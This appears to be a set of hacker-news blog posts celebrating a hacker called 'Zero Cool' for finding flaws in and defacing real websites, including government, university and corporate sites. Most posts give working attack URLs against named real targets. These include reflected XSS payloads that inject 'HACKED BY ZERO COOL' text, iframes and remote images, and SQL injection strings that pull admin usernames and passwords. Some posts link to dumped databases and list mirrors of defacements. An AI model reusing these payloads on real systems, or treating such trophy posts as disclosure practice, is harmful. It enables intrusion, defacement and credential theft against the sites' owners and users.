NASA Sub-domain is Vulnerable Allowing Information Disclosure

NASA Sub-domain is Vulnerable Allowing Serious Information Disclosure

National Aeronautics and Space Administration, widely known as NASA used to fascinate the hackers to come and breach its security system. Many of our readers may be astonished after reading the above lines, but its a fact and history is the witness of that. So far NASA have been targeted several times, where hackers have figured out vulnerability and penetrated the digital security. Yet again same thing happened to NASA, when an ethical hacker from India going by the name of "Zero Cool" find out serious loopholes in one of the sub-domain of NASA, which could lead sensitive information disclosure. The hacker shared a vulnerability report with us, where he has shown that, exploiting the vulnerability one malicious attacker can easily extract lots of confidential data from NASA server, such as source code of various programs (used by NASA), current project information, future research paper, topological graph, license information, several executable files, .dll files, private application software & it's source codes, employ details and many more highly confidential or in other word "Top Secrete" data and files. For security and privacy purpose we are not disclosing those vulnerable links, but exclusively for VOGH readers we are sharing few images to justify the fact. 

This vulnerability report has already been submitted to NASA, and as expected they immediately reacted and promised to path those loopholes with immediate effect. While talking about the ethical hacker "Zero" we would like to remind you that, before this NASA vulnerability disclosure, he exposed several vulnerabilities among many major and high profile websites such as Facebook, Reebok,Indiagames, mtv, lapdonline, UNESCO, Toshiba, Discovery.com, Novell.com, Microsoft Store India, several Pakistani  and Bangladeshi Govt websites and many more.  

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">NASA Sub-domain is Vulnerable Allowing Information Disclosure"https://www.voiceofgreyhat.com/2013/02/NASA-Sub-domain-is-Vulnerable.html</a>

toshiba-india.com is Vulnerable to SQL-i

The Official Website of Toshiba India is SQL-i Injection vulnerable. This vulnerability has been found By Zero Cool.

Vulnerable Website:-

http://www.toshiba-india.com/

Vulnerable  Link:-

http://www.toshiba-india.com/service_centers.aspx?sid=2

Databases:-

http://pastebin.com/d9F86JGF

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">toshiba-india.com is Vulnerable to SQL-i"https://www.voiceofgreyhat.com/2011/07/toshiba-indiacom-is-vulnerable-to-sql-i.html</a>

Discovery.com Vulnerable to XSS Said Zero

Zero Cool found non-persisting XSS vulnerability on the Official Website of Discovery.

Vulnerable Website:-

http://dsc.discovery.com/

Vulnerable Link:-

http://news.discovery.com/search/results.html?focus=site&query=%3E%22%3E%3CMARQUEE%3EHACKED+BY+ZERO+COOL%3C%2FMARQUEE%3E%3Ciframe%2Bsrc%2B%253D%22http%253A%252F%252Fwww.indishell.in%22%2Bwidth%253D%22100%2525%22%2Bheight%253D%22100%2525%22%3E%3C%252Fiframe%3E%26Submit%3DGo&search.x=37&search.y=14&search=search

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Discovery.com Vulnerable to XSS Said Zero"https://www.voiceofgreyhat.com/2011/07/discoverycom-vulnerable-to-xss-said.html</a>

Trinity Campus & Adonai Technologies Hacked by ZERO

Trinity Campus  Hacked Again but this time by ZERO COOL. He also hacked into the website of Adonai Technologies. 

Hacked websites:-

http://www.trinitycampus.in/uploads/

http://www.lnctgroup.in/uploads/index.html  

http://www.ggitm.net/uploads/index.html

http://www.adonai.co.in/oriental/uploads/index.html 

Mirror Links:- 

http://mirror.sec-t.net/defacements/?id=49705

http://legend-h.org/mirror/187209/lnctgroup.in/uploads/index.html

http://legend-h.org/mirror/187211/ggitm.net/uploads/index.html

http://legend-h.org/mirror/187212/adonai.co.in/oriental/uploads/index.html

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Trinity Campus & Adonai Technologies Hacked by ZERO"https://www.voiceofgreyhat.com/2011/07/trinity-campus-adonai-technologies.html</a>

2 Pakistani Websites hacked by Zero

2 Pakistani Websites hacked by Zero COOL.

Hacked Sites :-

http://www.khyber.edu.pk/

http://avenuesconsultants.pk/

Mirror Links:-

http://legend-h.org/mirror/186318/khyber.edu.pk/

http://mirror.sec-t.net/defacements/?id=48867

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">2 Pakistani Websites hacked by Zero"https://www.voiceofgreyhat.com/2011/07/2-pakistani-websites-hacked-by-zero.html</a>

Human Rights Commission of Pakistan SQL-i Vulnerable

Human Rights Commission of Pakistan is vulnerable for SQL-i attacks
This vulnerability has been found by zero cool


vulnerable link :-
http://www.hrcp-web.org/showdocument.asp?id=23%27

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Human Rights Commission of Pakistan SQL-i Vulnerable"https://www.voiceofgreyhat.com/2011/06/human-rights-commission-of-pakistan.html</a>

fedral revenue of Pakistan Govt. is vulnerable to Sql-i

Federal Revenue's website of Pakistan Govt. is vulnerable to SQL-i attack. The Vulnerability has been found found by zero cool.

Vulnerable Site:- 
http://n.fbr.gov.pk/

Click Here to Download the Database:-
http://pastebin.com/AbEVQx3X

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">fedral revenue of Pakistan Govt. is vulnerable to Sql-i"https://www.voiceofgreyhat.com/2011/05/fedral-revenue-of-pakistan-govt-is.html</a>

XSS in UK Gov sites found by Zero Cool

XSS vulnerability found by Zero Cool (XSS MASTER) on two UK Govt. website
Vulnerable Website:-
http://www.dfid.gov.uk

https://healthcaremagic.com/ Vulnerable link:- http://www.dfid.gov.uk/r4d/SearchResearchDatabase.asp?searchType=GoogleMiniCheck&q=%3E%22%3E%3CMARQUEE%3EHACKED+BY+ZERO+COOL%3C%2FMARQUEE%3E%3CIMG+src%3D%22http%3A%2F%2Ffc09.deviantart.net%2Ffs30%2Fi%2F2009%2F252%2Fe%2Fe%2FZero_Wallpaper_4_by_Zero1122.jpg%22+%3C%2FIMG%3E&x=9&y=12

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">XSS in UK Gov sites found by Zero Cool"https://www.voiceofgreyhat.com/2011/05/xss-in-uk-gov-sites-found-by-zero-cool.html</a>

Nepal GOV site is SQL-i vulnerable

Gov site of nepal is vulnerable  to sqli, and the flaws get detected by Zero Cool

Vulnerable Website:-
http://www.nationalmuseum.gov.np/

Vulnerable Link:-
link :=http://www.nationalmuseum.gov.np/news.php?id=2+union+select+group_concat%28id,0x3a,username,0x3a,password%29,2,3+FROM+admin--

zero cool also found one more nepal site vul to SQL-i and here is vul Link of the database:-

link:=http://www.katjazz.com.np/news.php?id=-55+union+select+1,2,group_concat%28id,0x3a,name,0x3a,mail%29,4,5+FROM+kjc_list--

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Nepal GOV site is SQL-i vulnerable"https://www.voiceofgreyhat.com/2011/05/nepal-gov-site-is-sql-i-vulnerable.html</a>

XSS in Bangladesh Bank's Website

non persistnace xss in www.bangladesh-bank.org found by XSS master Zero Cool.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">XSS in Bangladesh Bank's Website"https://www.voiceofgreyhat.com/2011/05/xss-in-bangladesh-banks-website.html</a>

XSS vulnerability on National Space Agency Pakistan & Pak Gov Radio's Websites

The National Space Agency of Pakistan Website is XSS vulnerable
website link is:-
http://www.suparco.gov.pk/

Also 
Paksitani Govt. Radio station's official website is vulnerable to XSS attack.
website link:-
www.radio.gov.pk


These 2 vulnerability Has been found by XSS master Zero Cool.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">XSS vulnerability on National Space Agency Pakistan & Pak Gov Radio's Websites"https://www.voiceofgreyhat.com/2011/05/xss-vulnerability-on-national-space.html</a>

Ministry of Food and Agriculture's website of Pakistan is SQL-i Vulnerable

SQL-i vulnerability found by Zero Cool on the Ministry of Food and Agriculture's website of Pakistan 


Website Link:- 
http://www.minfa.gov.pk

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Ministry of Food and Agriculture's website of Pakistan is SQL-i Vulnerable"https://www.voiceofgreyhat.com/2011/05/ministry-of-food-and-agricultures.html</a>

non-persistent xss vulnerability in Pakistan Railway's site

non-persistent xss vulnerability in www.pakrail.com found by zero cool.


link 


http://www.pakrail.com/search.php?txtsearch=%3E%22%3E%3Chead%3E+%3Ctitle%3EHacked+by+ZERO%3C%2Ftitle%3E+%3C%2Fh1%3E%3CBODY++++BGCOLOR%3D%22%23000000%22++++TEXT%3D%22%23FFFFFF%22+%3E+%3Cbody%3E+%3C%2Fhead%3E+%3Cbr%3E+%3Cbr%3E+%3Cbr%3E+%3Ccenter%3E%3Cimg+src%3D%22http://img156.imageshack.us/img156/1594/zeroso.png%22++%3E%3C%2Fcenter%3E+%3Cbr%3E+%3Ch3%3E+%3C%2Fcaption%3E+%3Ccenter%3E%3Ccaption%3E$+HACK%20+$+ME+$+IF%20U%20CAN+$%3C%2Fa%3E%3C%2Fcenter%3E+%3C%2Fcaption%3E+%3Cbr%3E+%3Ccenter%3E+%3Cbody+onLoad%3D%22document.form.input.focus%28%29%3B%22%3E++%3Cbr%3E+%3Cfont+color%3D%22red%22%3E%3Cspan+id%3D%22typing%22%3E+Your+site+is+vulnerable+to+xxs+%3Cbr%3E+Hacked+by+ZERO%3C%2Fspan%3E++%3Cscript+type%3D%22text%2Fjavascript%22%3E++interval+%3D+30%3B+%2F%2F+Interval+in+milliseconds+to+wait+between+characters++if%28document.getElementById%29+{+t+%3D+document.getElementById%28%22typing%22%29%3B+if%28t.innerHTML%29+{+typingBuffer+%3D+%22%22%3B+%2F%2F+buffer+prevents+some+browsers+stripping+spaces+it+%3D+0%3B+mytext+%3D+t.innerHTML%3B+t.innerHTML+%3D+%22%22%3B+typeit%28%29%3B+}+}++function+typeit%28%29+{+mytext+%3D+mytext.replace%28%2F%3C%28[^%3C]%29*%3E%2F%2C+%22%22%29%3B+%2F%2F+Strip+HTML+from+text+if%28it+%3C+mytext.length%29+{+typingBuffer+%2B%3D+mytext.charAt%28it%29%3B+t.innerHTML+%3D+typingBuffer%3B+it%2B%2B%3B+setTimeout%28%22typeit%28%29%22%2C+interval%29%3B+}+}+%3C%2Fscript%3E+%3Cbr%3E+%3C%2Ffont%3E+%3Cbr%3E+%3Cbr%3E+%3Ccenter%3E%3Ccaption%3Eyou.got.hacked.by.ZERO...!!!!%3C%2Fa%3E%3C%2Fcenter%3E+%3C!--+Start+of+StatCounter+Code+--%3E+%3Cscript+type%3D%22text%2Fjavascript%22%3E+var+sc_project%3D6474887%3B++var+sc_invisible%3D1%3B++var+sc_security%3D%229181d223%22%3B++%3C%2Fscript%3E++%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22http%3A%2F%2Fwww.statcounter.com%2Fcounter%2Fcounter.js%22%3E%3C%2Fscript%3E%3Cnoscript%3E%3Cdiv+class%3D%22statcounter%22%3E%3Ca+title%3D%22hit+counter%22+href%3D%2 2http%3A%2F%2Fstatcounter.com%2Ffree_hit_counter.html%22+target%3D%22_blank%22%3E%3Cimg+class%3D%22statcounter%22+src%3D%22http%3A%2F%2Fc.statcounter.com%2F6474887%2F0%2F9181d223%2F1%2F%22+alt%3D%22hit+counter%22+%3E%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fnoscript%3E+%3C!--+End+of+StatCounter+Code+--%3E%3C%2Fbody%3E+%3C%2Fdiv%3E+%3C%2Fform%3E+%3C%2Fcenter%3E+%3C%2Fbody%3E&x=0&y=0

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">non-persistent xss vulnerability in Pakistan Railway's site"https://www.voiceofgreyhat.com/2011/05/non-persistent-xss-vulnerability-in.html</a>

XSS vulnerability found by zero cool on (reebok,indiagames,mtv,lapdonline,unesco,pcboard)

XSS vulnerability found by zero cool on
rebook.com
bsnl1.indiagames.com
www.lapdonline.org
whc.unesco.org
cricket.com.au

http://www.reebok.com/IN/search?t=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Ciframe+src+%3D%22http://www.voiceofgreyhat.com/2011/04/xss-vulnerability-found-by-zero-cool.html%22+width%3D%22100%25%22+height%3D%22100%25%22%3E%3C%2Fiframe%3E&Submit=Go

http://bsnl1.indiagames.com/bpremium/index.jsp  


vul link= [put the code in the search bar] >"><MARQUEE>HACKED BY ZERO COOL</MARQUEE><img src="http://img204.imageshack.us/img204/1322/zeropk.png" img>

http://www.lapdonline.org/ 


vul link=  http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Cimg%20src=%22http://img204.imageshack.us/img204/1322/zeropk.png%22%20img%3E

http://www.mtv.co.uk/


vul link = http://www.mtv.co.uk/search?k=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Cimg%20src=%22http://img204.imageshack.us/img204/1322/zeropk.png%22%20img%3E&op=Search

http://www.pcboard.com.pk/
vul link=  [put the code in the search bar] >"><MARQUEE>HACKED BY ZERO COOL</MARQUEE><img src="http://img204.imageshack.us/img204/1322/zeropk.png" img>

http://whc.unesco.org/


vul link =http://whc.unesco.org/en/list/?search=%3E%22%3E%3CMARQUEE%3EHACKED+BY+ZERO+COOL%3C%2FMARQUEE%3E%3Cimg+src%3D%22http%3A%2F%2Fimg204.imageshack.us%2Fimg204%2F1322%2Fzeropk.png%22+img%3E&searchSites=&search_by_country=&search_yearinscribed=&type=&themes=&media=&region=&criteria_restrication=&order=


html injection vul in  cricket.com.au also found by zero cool

http://cricket.com.au/searchresult/%3Cimg%20src=%22http://fc09.deviantart.net/fs30/i/2009/252/e/e/Zero_Wallpaper_4_by_Zero1122.jpg%22%20%3C/img%3E

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">XSS vulnerability found by zero cool on (reebok,indiagames,mtv,lapdonline,unesco,pcboard)"https://www.voiceofgreyhat.com/2011/04/xss-vulnerability-found-by-zero-cool-on.html</a>

XSS vulnerability found by zero cool

serious XSS vulnerability found by Zero Cool on 
americanidol.com 
and 
on flicker.com

here is the vul link
http://myidol.americanidol.com/go/network/search/?terms=%3E%22%3E%3Cmarquee%3Ehacked+by+zero+cool%3C%2Fmarquee%3E%3CIMG%20src=%22http://fc09.deviantart.net/fs30/i/2009/252/e/e/Zero_Wallpaper_4_by_Zero1122.jpg%22%20%3C/IMG%3E

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">XSS vulnerability found by zero cool"https://www.voiceofgreyhat.com/2011/04/xss-vulnerability-found-by-zero-cool.html</a>